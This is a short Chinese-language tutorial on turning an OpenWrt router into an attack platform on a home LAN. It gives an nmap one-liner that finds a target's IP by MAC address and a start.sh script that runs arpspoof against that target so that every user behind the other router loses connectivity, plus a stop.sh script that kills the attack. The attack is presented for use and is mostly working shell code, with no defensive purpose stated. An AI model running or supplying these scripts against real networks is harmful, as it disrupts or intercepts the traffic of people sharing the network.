前言

作为智能路由器的操作系统，openwrt可以做很多一般路由器系统难以完成的任务。而且由于它作为整个局域网上网的出口和入口，一旦有问题，影响是很大的。

攻击场景

我实验的环境是这样的，屋子有2个房间，每个房间一个路由，都通过一个主的电信的光猫来上网（内网地址192.168.1.1），其中一个房间的路由刷入了openwrt系统（内网地址192.168.1.2），另一个为普通的路由器（内网地址192.168.1.3）。我们攻击者连接到OPENWRT路由器上，此时相当于攻击者和另一台普通路由器处于了网络拓扑中的同一级，此时我们在局域网中常见的攻击手法就都可以使用了。如果此时，我们在openwrt上对另一台普通的路由进行arp欺骗、arp断网等攻击，那么凡是连接到那个普通路由器的用户的上网活动都将受到影响。

通过Nmap获取需要攻击的设备的IP地址

IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`

我们可以先扫描一下当前网段的设备，然后排查出需要重点关注的设备MAC地址,以后我们就可以通过自动化的脚步来直接获取与该MAC地址对应得IP地址并进行攻击了。

进行ARP欺骗攻击

启动脚本 start.sh
<pre>
IP=`nmap -sn 192.168.1.0/24 | grep -B2 XX:XX:XX:XX:XX:XX | head -1 |awk '{
print $5}'`
if [[ "" != "$IP" ]]; then
echo "killing $IP"
arpspoof -i eth0.2 -t $IP 192.168.1.1 &
fi
</pre>

停止脚本 stop.sh
<pre>
PID=`ps | grep arpspoof | grep -v grep | awk '{print $1}'`
if [[ "" != "$PID" ]]; then
echo "killing $PID"
kill -9 $PID
fi
</pre>

注意

由于openwrt版本不同，上述命令可能需要做相应的调整。部分软件需要先安装再使用。